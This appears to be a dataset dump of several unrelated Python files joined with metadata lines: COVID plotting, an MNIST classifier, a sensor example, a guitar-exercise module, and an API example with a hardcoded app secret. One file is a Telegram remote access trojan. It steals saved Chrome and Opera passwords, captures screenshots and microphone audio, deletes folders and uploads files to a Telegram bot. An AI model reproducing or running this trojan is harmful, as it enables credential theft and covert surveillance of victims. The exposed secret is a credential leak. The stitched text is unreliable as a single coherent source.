import pandas as pd from os import path from datetime import datetime, timedelta class COVID: def __init__(self): self.descarga_datos() self.get_estado() #self.grafica_matplot() self.grafica_plotly() def descarga_datos(self): hoy = datetime.now() - timedelta(1) fecha = hoy.strftime("%Y%m%d") file_confirmados = f'Casos_Diarios_Estado_Nacional_Confirmados_{fecha}.csv' file_defunciones = f'Casos_Diarios_Estado_Nacional_Defunciones_{fecha}.csv' url1 = f'https://datos.covid-19.conacyt.mx/Downloads/Files/{file_confirmados}' url2 = f'https://datos.covid-19.conacyt.mx/Downloads/Files/{file_defunciones}' print(url1) if not path.exists(file_confirmados): df = pd.read_csv(url1) df.to_csv(file_confirmados) print(f'Archivo {file_confirmados} descargado') df = pd.read_csv(url2) df.to_csv(file_defunciones) print(f'Archivo {file_defunciones} descargado') else: print('Archivos previamente descargados') self.df_conf = pd.read_csv(file_confirmados, parse_dates=True) self.df_def = pd.read_csv(file_defunciones, parse_dates=True) def get_estado(self): estados = list(self.df_conf['nombre']) print(estados) estado = input('Seleccione un estado o Nacional (default Nacional): ') if estado is None or estado == '': self.estado = 'Nacional' else: self.estado = estado.upper() df_filtered_conf = self.df_conf.query(f"nombre == '{self.estado}'") self.data_conf = df_filtered_conf.sum()[4:] df_filtered_def = self.df_def.query(f"nombre == '{self.estado}'") self.data_def = df_filtered_def.sum()[4:] def grafica_plotly(self): pd.options.plotting.backend = "plotly" data1 = self.data_conf data2 = self.data_def data = pd.concat([data1, data2], axis=1) fig = data.plot(title=f'Contagios COVID-19 ({self.estado})', template="simple_white", labels=dict(index="Fecha", value="Cantidad", variable="")) fig.data[0].name = 'Contagios' fig.data[1].name = 'Defunciones' fig.show() def grafica_matplot(self): import matplotlib.pyplot as plt data1 = self.data_conf data2 = self.data_def plt.title(f'Contagios COVID-19 
({self.estado})') plt.xlabel(f'Fecha') plt.rc('xtick', labelsize=8) plt.xticks(fontsize=6) plt.xticks(rotation=70) plt.grid(True) plt.ticklabel_format(useOffset=False) ax = data1.plot() data2.plot(ax=ax) plt.show() covid = COVID()
es
0.101117
#self.grafica_matplot()
3.138983
3
tf_mnist.py
latenite4/python3
0
6628961
<gh_stars>0 #!/usr/bin/python3 # implement TF model which will be used to classify MNIST digits using keras. # # Name: <NAME> # email: <EMAIL> # date: 1/3/2021 # based on: https://www.youtube.com/watch?v=bee0GrKBCrE # you will need sudo apt install nvidia-cuda-toolkit import tensorflow as tf from tensorflow import keras from matplotlib import pyplot as plt import numpy as np import time,sys,os,platform,distro,vers from tensorflow.python.client import device_lib #try to install TF 2 if it will run on this HW # try: # tensorflow_version #<< this function only exists in google colab VM # print('installed TF 2.x') # except Exception: # print('could not install TF 2') # pass if __name__ == '__main__': vers.show_versions_info() #see if GPU is available physical_devices = tf.config.experimental.list_physical_devices('GPU') print('num GPUs ',len(physical_devices)) # if len(physical_devices) > 0: # tf.config.experimental.set_memory_growth(physical_devices[0],True) objects = tf.keras.datasets.mnist # many images of digits 0-9 (training_images, training_labels),(test_images,test_labels) = objects.load_data() device_lib.list_local_devices() #print some of the digit images for i in range(9): plt.subplot(330+1+i) plt.imshow(training_images[i]) # print dimensions for training data print(training_images.shape) #print 1st training image of one digit print(training_images[0]) #now normalize all training and test input values to 0 - 1 training_images = training_images / 255.0 test_images = test_images / 255.0 m = tf.keras.models.Sequential([tf.keras.layers.Flatten(input_shape=(28,28)), tf.keras.layers.Dense(128,activation='relu'), tf.keras.layers.Dense(10,activation=tf.nn.softmax)]) m.summary() #show summary m.compile(optimizer = tf.keras.optimizers.Adam(), loss = 'sparse_categorical_crossentropy', metrics=['accuracy']) #train the model t = time.time() m.fit(training_images,training_labels,epochs=5,shuffle=True) #5 itterations over all data print(f'training duration: {time.time() - 
t}s') start_test_time = time.time() m.evaluate(test_images,test_labels) print(f'test duration: {time.time() - start_test_time}s') # write out one hot data values so we know what they are. # test_images.class_indices #show first image from test data plt.imshow(test_images[0]) prediction=m.predict(test_images) # do all test images print('predicted number0: ',np.argmax(prediction[0])) print(': ',prediction[0]) print('predicted number1: ',np.argmax(prediction[1])) print(': ',prediction[1]) print('predicted number2: ',np.argmax(prediction[2])) print(': ',prediction[2]) print('predicted number3: ',np.argmax(prediction[3])) print(': ',prediction[3]) print('predicted number4: ',np.argmax(prediction[4])) print(': ',prediction[4])
#!/usr/bin/python3 # implement TF model which will be used to classify MNIST digits using keras. # # Name: <NAME> # email: <EMAIL> # date: 1/3/2021 # based on: https://www.youtube.com/watch?v=bee0GrKBCrE # you will need sudo apt install nvidia-cuda-toolkit import tensorflow as tf from tensorflow import keras from matplotlib import pyplot as plt import numpy as np import time,sys,os,platform,distro,vers from tensorflow.python.client import device_lib #try to install TF 2 if it will run on this HW # try: # tensorflow_version #<< this function only exists in google colab VM # print('installed TF 2.x') # except Exception: # print('could not install TF 2') # pass if __name__ == '__main__': vers.show_versions_info() #see if GPU is available physical_devices = tf.config.experimental.list_physical_devices('GPU') print('num GPUs ',len(physical_devices)) # if len(physical_devices) > 0: # tf.config.experimental.set_memory_growth(physical_devices[0],True) objects = tf.keras.datasets.mnist # many images of digits 0-9 (training_images, training_labels),(test_images,test_labels) = objects.load_data() device_lib.list_local_devices() #print some of the digit images for i in range(9): plt.subplot(330+1+i) plt.imshow(training_images[i]) # print dimensions for training data print(training_images.shape) #print 1st training image of one digit print(training_images[0]) #now normalize all training and test input values to 0 - 1 training_images = training_images / 255.0 test_images = test_images / 255.0 m = tf.keras.models.Sequential([tf.keras.layers.Flatten(input_shape=(28,28)), tf.keras.layers.Dense(128,activation='relu'), tf.keras.layers.Dense(10,activation=tf.nn.softmax)]) m.summary() #show summary m.compile(optimizer = tf.keras.optimizers.Adam(), loss = 'sparse_categorical_crossentropy', metrics=['accuracy']) #train the model t = time.time() m.fit(training_images,training_labels,epochs=5,shuffle=True) #5 itterations over all data print(f'training duration: {time.time() - t}s') 
start_test_time = time.time() m.evaluate(test_images,test_labels) print(f'test duration: {time.time() - start_test_time}s') # write out one hot data values so we know what they are. # test_images.class_indices #show first image from test data plt.imshow(test_images[0]) prediction=m.predict(test_images) # do all test images print('predicted number0: ',np.argmax(prediction[0])) print(': ',prediction[0]) print('predicted number1: ',np.argmax(prediction[1])) print(': ',prediction[1]) print('predicted number2: ',np.argmax(prediction[2])) print(': ',prediction[2]) print('predicted number3: ',np.argmax(prediction[3])) print(': ',prediction[3]) print('predicted number4: ',np.argmax(prediction[4])) print(': ',prediction[4])
en
0.608863
#!/usr/bin/python3 # implement TF model which will be used to classify MNIST digits using keras. # # Name: <NAME> # email: <EMAIL> # date: 1/3/2021 # based on: https://www.youtube.com/watch?v=bee0GrKBCrE # you will need sudo apt install nvidia-cuda-toolkit #try to install TF 2 if it will run on this HW # try: # tensorflow_version #<< this function only exists in google colab VM # print('installed TF 2.x') # except Exception: # print('could not install TF 2') # pass #see if GPU is available # if len(physical_devices) > 0: # tf.config.experimental.set_memory_growth(physical_devices[0],True) # many images of digits 0-9 #print some of the digit images # print dimensions for training data #print 1st training image of one digit #now normalize all training and test input values to 0 - 1 #show summary #train the model #5 itterations over all data # write out one hot data values so we know what they are. # test_images.class_indices #show first image from test data # do all test images
3.471812
3
example.py
leonxi/python-qingping
0
6628962
from qingping.client import QingPing app_key = "_ysnN4hMg" app_secret = "51e92ce81cbb11ebae5a00163e06ed69" client = QingPing(app_key, app_secret) devices = client.devices.list() print(devices)
from qingping.client import QingPing app_key = "_ysnN4hMg" app_secret = "51e92ce81cbb11ebae5a00163e06ed69" client = QingPing(app_key, app_secret) devices = client.devices.list() print(devices)
none
1
1.817903
2
technique/right_hand.py
keremkoseoglu/Guitar-Training-Remote
4
6628963
<reponame>keremkoseoglu/Guitar-Training-Remote """ Right hand techniques """ import random from config import get_configuration class RightHand: """ Right hand techniques """ def __init__(self): config = get_configuration() self._techniques = config["right_hand_exercises"] def _clone_techniques(self) -> []: output = [] for i in range(0, len(self._techniques)): output.append(self._techniques[i]) return output def get_random_techniques(self, count) -> []: """ Returns random right hand techniques """ output = [] local_tech = self._clone_techniques() for i in range(0, count): # pylint: disable=W0612 if len(local_tech) == 0: break random_tech_index = random.randint(0, len(local_tech) - 1) random_tech = local_tech.pop(random_tech_index) output.append(random_tech) return output
""" Right hand techniques """ import random from config import get_configuration class RightHand: """ Right hand techniques """ def __init__(self): config = get_configuration() self._techniques = config["right_hand_exercises"] def _clone_techniques(self) -> []: output = [] for i in range(0, len(self._techniques)): output.append(self._techniques[i]) return output def get_random_techniques(self, count) -> []: """ Returns random right hand techniques """ output = [] local_tech = self._clone_techniques() for i in range(0, count): # pylint: disable=W0612 if len(local_tech) == 0: break random_tech_index = random.randint(0, len(local_tech) - 1) random_tech = local_tech.pop(random_tech_index) output.append(random_tech) return output
en
0.412256
Right hand techniques Right hand techniques Returns random right hand techniques # pylint: disable=W0612
2.829706
3
examples/lsm6ds_lsm6dsox_mlc_test.py
adafruit/Adafruit_CircuitPython_LSM6DSOX
0
6628964
<reponame>adafruit/Adafruit_CircuitPython_LSM6DSOX # SPDX-FileCopyrightText: Copyright (c) 2020 <NAME> for Adafruit Industries # # SPDX-License-Identifier: MIT # LSM6DSOX IMU MLC (Machine Learning Core) Example. # Download the raw UCF file, copy to storage and reset. # NOTE: The pre-trained models (UCF files) for the examples can be found here: # https://github.com/STMicroelectronics/STMems_Machine_Learning_Core/tree/master/application_examples/lsm6dsox import time import board from adafruit_lsm6ds.lsm6dsox import LSM6DSOX from adafruit_lsm6ds import Rate, AccelRange, GyroRange i2c = board.STEMMA_I2C() # uses board.SCL and board.SDA # Vibration detection example UCF_FILE = "lsm6dsox_vibration_monitoring.ucf" UCF_LABELS = {0: "no vibration", 1: "low vibration", 2: "high vibration"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. lsm = LSM6DSOX(i2c, ucf=UCF_FILE) lsm.gyro_range = GyroRange.RANGE_2000_DPS lsm.accelerometer_range = AccelRange.RANGE_4G lsm.accelerometer_data_rate = Rate.RATE_26_HZ lsm.gyro_data_rate = Rate.RATE_26_HZ # Head gestures example # UCF_FILE = "lsm6dsox_head_gestures.ucf" # UCF_LABELS = {0:"Nod", 1:"Shake", 2:"Stationary", 3:"Swing", 4:"Walk"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. # lsm = LSM6DSOX(i2c, ucf=UCF_FILE) # lsm.gyro_range = GyroRange.RANGE_250_DPS # lsm.accelerometer_range = AccelRange.RANGE_2G # lsm.accelerometer_data_rate = Rate.RATE_26_HZ # lsm.gyro_data_rate = Rate.RATE_26_HZ # 6 DOF Position example # UCF_FILE = "lsm6dsox_six_d_position.ucf" # UCF_LABELS = {0:"None", 1:"X-UP", 2:"X-DOWN", 3:"Y-UP", 4:"Y-DOWN", 5:"Z-UP", 6:"Z-DOWN"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. 
# lsm = LSM6DSOX(i2c, ucf=UCF_FILE) # lsm.gyro_range = GyroRange.RANGE_250_DPS # lsm.accelerometer_range = AccelRange.RANGE_2G # lsm.accelerometer_data_rate = Rate.RATE_26_HZ # lsm.gyro_data_rate = Rate.RATE_26_HZ print("MLC configured...") while True: buf = lsm.read_mlc_output() if buf is not None: print(UCF_LABELS[buf[0]]) # delay to allow interrupt flag to clear # interrupt stays high for one sample interval # (38.4 ms @ 26 Hz ot 19.2 ms @ 52Hz) time.sleep(0.05)
# SPDX-FileCopyrightText: Copyright (c) 2020 <NAME> for Adafruit Industries # # SPDX-License-Identifier: MIT # LSM6DSOX IMU MLC (Machine Learning Core) Example. # Download the raw UCF file, copy to storage and reset. # NOTE: The pre-trained models (UCF files) for the examples can be found here: # https://github.com/STMicroelectronics/STMems_Machine_Learning_Core/tree/master/application_examples/lsm6dsox import time import board from adafruit_lsm6ds.lsm6dsox import LSM6DSOX from adafruit_lsm6ds import Rate, AccelRange, GyroRange i2c = board.STEMMA_I2C() # uses board.SCL and board.SDA # Vibration detection example UCF_FILE = "lsm6dsox_vibration_monitoring.ucf" UCF_LABELS = {0: "no vibration", 1: "low vibration", 2: "high vibration"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. lsm = LSM6DSOX(i2c, ucf=UCF_FILE) lsm.gyro_range = GyroRange.RANGE_2000_DPS lsm.accelerometer_range = AccelRange.RANGE_4G lsm.accelerometer_data_rate = Rate.RATE_26_HZ lsm.gyro_data_rate = Rate.RATE_26_HZ # Head gestures example # UCF_FILE = "lsm6dsox_head_gestures.ucf" # UCF_LABELS = {0:"Nod", 1:"Shake", 2:"Stationary", 3:"Swing", 4:"Walk"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. # lsm = LSM6DSOX(i2c, ucf=UCF_FILE) # lsm.gyro_range = GyroRange.RANGE_250_DPS # lsm.accelerometer_range = AccelRange.RANGE_2G # lsm.accelerometer_data_rate = Rate.RATE_26_HZ # lsm.gyro_data_rate = Rate.RATE_26_HZ # 6 DOF Position example # UCF_FILE = "lsm6dsox_six_d_position.ucf" # UCF_LABELS = {0:"None", 1:"X-UP", 2:"X-DOWN", 3:"Y-UP", 4:"Y-DOWN", 5:"Z-UP", 6:"Z-DOWN"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. 
# lsm = LSM6DSOX(i2c, ucf=UCF_FILE) # lsm.gyro_range = GyroRange.RANGE_250_DPS # lsm.accelerometer_range = AccelRange.RANGE_2G # lsm.accelerometer_data_rate = Rate.RATE_26_HZ # lsm.gyro_data_rate = Rate.RATE_26_HZ print("MLC configured...") while True: buf = lsm.read_mlc_output() if buf is not None: print(UCF_LABELS[buf[0]]) # delay to allow interrupt flag to clear # interrupt stays high for one sample interval # (38.4 ms @ 26 Hz ot 19.2 ms @ 52Hz) time.sleep(0.05)
en
0.676101
# SPDX-FileCopyrightText: Copyright (c) 2020 <NAME> for Adafruit Industries # # SPDX-License-Identifier: MIT # LSM6DSOX IMU MLC (Machine Learning Core) Example. # Download the raw UCF file, copy to storage and reset. # NOTE: The pre-trained models (UCF files) for the examples can be found here: # https://github.com/STMicroelectronics/STMems_Machine_Learning_Core/tree/master/application_examples/lsm6dsox # uses board.SCL and board.SDA # Vibration detection example # NOTE: Selected data rate and scale must match the MLC data rate and scale. # Head gestures example # UCF_FILE = "lsm6dsox_head_gestures.ucf" # UCF_LABELS = {0:"Nod", 1:"Shake", 2:"Stationary", 3:"Swing", 4:"Walk"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. # lsm = LSM6DSOX(i2c, ucf=UCF_FILE) # lsm.gyro_range = GyroRange.RANGE_250_DPS # lsm.accelerometer_range = AccelRange.RANGE_2G # lsm.accelerometer_data_rate = Rate.RATE_26_HZ # lsm.gyro_data_rate = Rate.RATE_26_HZ # 6 DOF Position example # UCF_FILE = "lsm6dsox_six_d_position.ucf" # UCF_LABELS = {0:"None", 1:"X-UP", 2:"X-DOWN", 3:"Y-UP", 4:"Y-DOWN", 5:"Z-UP", 6:"Z-DOWN"} # NOTE: Selected data rate and scale must match the MLC data rate and scale. # lsm = LSM6DSOX(i2c, ucf=UCF_FILE) # lsm.gyro_range = GyroRange.RANGE_250_DPS # lsm.accelerometer_range = AccelRange.RANGE_2G # lsm.accelerometer_data_rate = Rate.RATE_26_HZ # lsm.gyro_data_rate = Rate.RATE_26_HZ # delay to allow interrupt flag to clear # interrupt stays high for one sample interval # (38.4 ms @ 26 Hz ot 19.2 ms @ 52Hz)
2.555432
3
virus/remote_control_telegram/system.py
theDarkc0mrade/CyberSecurity
3
6628965
<filename>virus/remote_control_telegram/system.py import telebot import os import requests from PIL import ImageGrab import shutil import sqlite4 import win32crypt import platform import webbrowser import time import subprocess import cv2 import sys import wave import pyaudio bot_token = "<KEY>" chat_id = "ВАШ ЧАТ ID" bot = telebot.TeleBot(bot_token) def Chrome(): text = '\nPasswords Chrome:' + '\n' if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'): shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') cursor = conn.cursor() cursor.execute('SELECT action_url, username_value, password_value FROM logins') for result in cursor.fetchall(): password = <PASSWORD>Data(result[2])[1].decode() login = result[1] url = result[0] if password != '': text += '\nURL: ' + url + '\nLOGIN: ' + login + '\nPASSWORD: ' + password + '\n' return text file = open(os.getenv("APPDATA") + '\\passwords_chrome.txt', "w+") # file.write(str(Chrome()) + '\n') file.close() def function(): CHUNK = 1024 FORMAT = pyaudio.paInt16 CHANNELS = 2 RATE = 44100 RECORD_SECONDS = 60 WAVE_OUTPUT_FILENAME = "record.wav" p = pyaudio.PyAudio() stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK) bot.send_message(chat_id, "[LOG] Recording (60 seconds)...") frames = [] for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)): data = stream.read(CHUNK) frames.append(data) bot.send_message(chat_id, "[LOG] Done recording, please wait few minutes") stream.stop_stream() stream.close() p.terminate() wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb') wf.setnchannels(CHANNELS) wf.setsampwidth(p.get_sample_size(FORMAT)) wf.setframerate(RATE) wf.writeframes(b''.join(frames)) wf.close() @bot.message_handler(commands=['/audio', 
'Audio']) def send_audio(message): function() files = {'document': open(os.getenv(WAVE_OUTPUT_FILENAME), 'wb')} requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=files) def webca(): cap = cv2.VideoCapture(0) for i in range(30): cap.read() ret, frame = cap.read() cv2.imwrite('photo.png', frame) cap.release() @bot.message_handler(commands=['passwords', 'Passwords']) # ПАРОЛИ def send_passwords(message) : if ("{0}".format(message.text) == "/passwords chrome") : # Если сообщение /passwords chrome try: Chrome() bot.send_message(chat_id, "Wait...") files = {'document': open(os.getenv("APPDATA") + '\\passwords_chrome.txt','rb')} requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=files) except: bot.send_message(chat_id, "Ошибка! Браузер запущен!") elif ("{0}".format(message.text) == "/passwords opera") : # ИначеЕсли текст /passwords opera Opera() bot.send_message(chat_id, "Wait...") files = {'document': open(os.getenv("APPDATA") + '\\passwords_opera.txt','rb')} requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=files) else : bot.send_message(chat_id, "Ошибка! 
Команда введена неправильно!") def Opera(): texto = '\nPasswords Opera:' + '\n' texto += 'URL | LOGIN | PASSWORD' + '\n' if os.path.exists(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data'): shutil.copy2(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data', os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2') conn = sqlite3.connect(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2') cursor = conn.cursor() cursor.execute('SELECT action_url, username_value, password_value FROM logins') for result in cursor.fetchall(): password = <PASSWORD>(result[2])[1].decode() login = result[1] url = result[0] if password != '': texto += '\nURL: ' + url + '\nLOGIN: ' + login + '\nPASSWORD: ' + password + '\n' file = open(os.getenv("APPDATA") + '\\passwords_opera.txt', "w+") file.write(str(Opera()) + '\n') file.close() @bot.message_handler(commands=['start', 'Start']) def send_message(command): bot.send_message(chat_id, "Telegramm Rat 1.0.9[BETA]" + "\n\nЧтобы увидеть список команд введи команду /help") @bot.message_handler(commands=['screen', 'Screen']) def send_screen(command) : bot.send_message(chat_id, "Wait...") screen = ImageGrab.grab() screen.save(os.getenv("APPDATA") + '\\Sreenshot.jpg') screen = open(os.getenv("APPDATA") + '\\Sreenshot.jpg', 'rb') files = {'photo': screen} requests.post("https://api.telegram.org/bot" + bot_token + "/sendPhoto?chat_id=" + chat_id , files=files) @bot.message_handler(commands=['help', 'commands', 'Help', 'Commands']) def send_help(command): bot.send_message(chat_id, "Команды: \n /Screen - Скриншот экрана \n /Check - Инфо о пользователе \n /killprocess имя.exe - Убить процесс(исходя из названия)" + "\n /Direct - Узнать текущую директорию " + "\n /Cmd - Открыть Cmd \n /Openurl - Открыть ссылку \n /Ls - все папки и файлы в директории" + "\n /Cd директория - перейти в директорию \n /Download - скачать файл \n /Deldir - удалить папку" + "\n /passwords chrome - получить все пароли 
гугл \n /passwords opera - получить все пароли опера \n\nАвтор не несет никакой ответствесности за совершеные вами действия! ") @bot.message_handler(commands=['check', 'Check']) # ИНФОРМАЦИЯ def send_info(command) : username = os.getlogin() r = requests.get('http://ip.42.pl/raw') IP = r.text windows = platform.platform() processor = platform.processor() systemali = platform.version() bot.send_message(chat_id, "PC: " + username + "\nIP: " + IP + "\nOS: " + windows + "\nProcessor: " + processor + "\nVersion OS : " + systemali) @bot.message_handler(commands=['direct', 'Direct']) # ДИРЕКТОРИЯ def direct(command) : directory = os.path.abspath(os.getcwd()) bot.send_message(chat_id, "Текущая дериктория: \n" + (str(directory))) @bot.message_handler(commands=["killprocess", "Killprocess"]) # ПРОЦЕССЫ def killprocess(message): try: user_msg = "{0}".format(message.text) subprocess.call("taskkill /IM " + user_msg.split(" ")[1]) bot.send_message(chat_id, "Готово!") except: bot.send_message(chat_id, "Ошибка! процесс введен неправильно!") @bot.message_handler(commands=["cmd", "Cmd"]) # CMD def cmdopen(message) : subprocess.call("cmd") bot.send_message(chat_id, "Готово!") # Отправка сообщения @bot.message_handler(commands=["openurl", "Openurl"]) # ОТКРЫТЬ ССЫЛКУ def openurl(message): try: user_msg = "{0}".format(message.text) url = user_msg.split(" ")[1] webbrowser.open_new_tab(url) bot.send_message(chat_id, "Готово!") except: bot.send_message(chat_id, "Ошибка! ссылка введена неверно!") @bot.message_handler(commands=["ls", "Ls"]) # ВСЕ ФАЙЛЫ def lsdir(commands): try: dirs = '\n'.join(os.listdir(path=".")) bot.send_message(chat_id, "Files: " + "\n" + dirs) except: bot.send_message(chat_id, "Ошибка! 
файл введен неверно!") @bot.message_handler(commands=["cd", "Cd"]) # ПЕРЕЙТИ В ПАПКУ def cddir(message): try: user_msg = "{0}".format(message.text) # Переменная принемающая сообщение от юзера folder = user_msg.split(" ")[1] os.chdir(folder) bot.send_message(chat_id, "Директория изменена на " + folder) except: bot.send_message(chat_id, "Ошибка! Папка введена неправильно!") @bot.message_handler(commands =["Download", "download"]) # ЗАГРУЗКА ФАЙЛА def downloadfile(message): try: user_msg = "{0}".format(message.text) docc = user_msg.split(" ")[1] # Переменная, в которой содержится имя файла doccc = {'document': open(docc,'rb')} # Переменная для POST запроса requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=doccc) # Отправляем файл except: bot.send_message(chat_id, "Ошибка! Файл введен неверно!") @bot.message_handler(commands = ["deldir", "Deldir"]) # УДАЛИТЬ ПАПКУ def deletedir(message): try: user_msg = "{0}".format(message.text) # Переменная принемающая сообщение от юзера path2del = user_msg.split(" ")[1] os.removedirs(path2del) bot.send_message(chat_id, "Директория " + path2del + " удалена") except: bot.send_message(chat_id, "Ошибка! Папка введена неверно!") bot.polling()
<filename>virus/remote_control_telegram/system.py import telebot import os import requests from PIL import ImageGrab import shutil import sqlite4 import win32crypt import platform import webbrowser import time import subprocess import cv2 import sys import wave import pyaudio bot_token = "<KEY>" chat_id = "ВАШ ЧАТ ID" bot = telebot.TeleBot(bot_token) def Chrome(): text = '\nPasswords Chrome:' + '\n' if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'): shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') cursor = conn.cursor() cursor.execute('SELECT action_url, username_value, password_value FROM logins') for result in cursor.fetchall(): password = <PASSWORD>Data(result[2])[1].decode() login = result[1] url = result[0] if password != '': text += '\nURL: ' + url + '\nLOGIN: ' + login + '\nPASSWORD: ' + password + '\n' return text file = open(os.getenv("APPDATA") + '\\passwords_chrome.txt', "w+") # file.write(str(Chrome()) + '\n') file.close() def function(): CHUNK = 1024 FORMAT = pyaudio.paInt16 CHANNELS = 2 RATE = 44100 RECORD_SECONDS = 60 WAVE_OUTPUT_FILENAME = "record.wav" p = pyaudio.PyAudio() stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK) bot.send_message(chat_id, "[LOG] Recording (60 seconds)...") frames = [] for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)): data = stream.read(CHUNK) frames.append(data) bot.send_message(chat_id, "[LOG] Done recording, please wait few minutes") stream.stop_stream() stream.close() p.terminate() wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb') wf.setnchannels(CHANNELS) wf.setsampwidth(p.get_sample_size(FORMAT)) wf.setframerate(RATE) wf.writeframes(b''.join(frames)) wf.close() @bot.message_handler(commands=['/audio', 
'Audio']) def send_audio(message): function() files = {'document': open(os.getenv(WAVE_OUTPUT_FILENAME), 'wb')} requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=files) def webca(): cap = cv2.VideoCapture(0) for i in range(30): cap.read() ret, frame = cap.read() cv2.imwrite('photo.png', frame) cap.release() @bot.message_handler(commands=['passwords', 'Passwords']) # ПАРОЛИ def send_passwords(message) : if ("{0}".format(message.text) == "/passwords chrome") : # Если сообщение /passwords chrome try: Chrome() bot.send_message(chat_id, "Wait...") files = {'document': open(os.getenv("APPDATA") + '\\passwords_chrome.txt','rb')} requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=files) except: bot.send_message(chat_id, "Ошибка! Браузер запущен!") elif ("{0}".format(message.text) == "/passwords opera") : # ИначеЕсли текст /passwords opera Opera() bot.send_message(chat_id, "Wait...") files = {'document': open(os.getenv("APPDATA") + '\\passwords_opera.txt','rb')} requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id , files=files) else : bot.send_message(chat_id, "Ошибка! 
Команда введена неправильно!") def Opera(): texto = '\nPasswords Opera:' + '\n' texto += 'URL | LOGIN | PASSWORD' + '\n' if os.path.exists(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data'): shutil.copy2(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data', os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2') conn = sqlite3.connect(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2') cursor = conn.cursor() cursor.execute('SELECT action_url, username_value, password_value FROM logins') for result in cursor.fetchall(): password = <PASSWORD>(result[2])[1].decode() login = result[1] url = result[0] if password != '': texto += '\nURL: ' + url + '\nLOGIN: ' + login + '\nPASSWORD: ' + password + '\n' file = open(os.getenv("APPDATA") + '\\passwords_opera.txt', "w+") file.write(str(Opera()) + '\n') file.close() @bot.message_handler(commands=['start', 'Start']) def send_message(command): bot.send_message(chat_id, "Telegramm Rat 1.0.9[BETA]" + "\n\nЧтобы увидеть список команд введи команду /help") @bot.message_handler(commands=['screen', 'Screen']) def send_screen(command) : bot.send_message(chat_id, "Wait...") screen = ImageGrab.grab() screen.save(os.getenv("APPDATA") + '\\Sreenshot.jpg') screen = open(os.getenv("APPDATA") + '\\Sreenshot.jpg', 'rb') files = {'photo': screen} requests.post("https://api.telegram.org/bot" + bot_token + "/sendPhoto?chat_id=" + chat_id , files=files) @bot.message_handler(commands=['help', 'commands', 'Help', 'Commands']) def send_help(command): bot.send_message(chat_id, "Команды: \n /Screen - Скриншот экрана \n /Check - Инфо о пользователе \n /killprocess имя.exe - Убить процесс(исходя из названия)" + "\n /Direct - Узнать текущую директорию " + "\n /Cmd - Открыть Cmd \n /Openurl - Открыть ссылку \n /Ls - все папки и файлы в директории" + "\n /Cd директория - перейти в директорию \n /Download - скачать файл \n /Deldir - удалить папку" + "\n /passwords chrome - получить все пароли 
гугл \n /passwords opera - получить все пароли опера \n\nАвтор не несет никакой ответствесности за совершеные вами действия! ") @bot.message_handler(commands=['check', 'Check']) # ИНФОРМАЦИЯ def send_info(command) : username = os.getlogin() r = requests.get('http://ip.42.pl/raw') IP = r.text windows = platform.platform() processor = platform.processor() systemali = platform.version() bot.send_message(chat_id, "PC: " + username + "\nIP: " + IP + "\nOS: " + windows + "\nProcessor: " + processor + "\nVersion OS : " + systemali) @bot.message_handler(commands=['direct', 'Direct']) # ДИРЕКТОРИЯ def direct(command) : directory = os.path.abspath(os.getcwd()) bot.send_message(chat_id, "Текущая дериктория: \n" + (str(directory))) @bot.message_handler(commands=["killprocess", "Killprocess"]) # ПРОЦЕССЫ def killprocess(message): try: user_msg = "{0}".format(message.text) subprocess.call("taskkill /IM " + user_msg.split(" ")[1]) bot.send_message(chat_id, "Готово!") except: bot.send_message(chat_id, "Ошибка! процесс введен неправильно!") @bot.message_handler(commands=["cmd", "Cmd"]) # CMD def cmdopen(message) : subprocess.call("cmd") bot.send_message(chat_id, "Готово!") # Отправка сообщения @bot.message_handler(commands=["openurl", "Openurl"]) # ОТКРЫТЬ ССЫЛКУ def openurl(message): try: user_msg = "{0}".format(message.text) url = user_msg.split(" ")[1] webbrowser.open_new_tab(url) bot.send_message(chat_id, "Готово!") except: bot.send_message(chat_id, "Ошибка! ссылка введена неверно!") @bot.message_handler(commands=["ls", "Ls"]) # ВСЕ ФАЙЛЫ def lsdir(commands): try: dirs = '\n'.join(os.listdir(path=".")) bot.send_message(chat_id, "Files: " + "\n" + dirs) except: 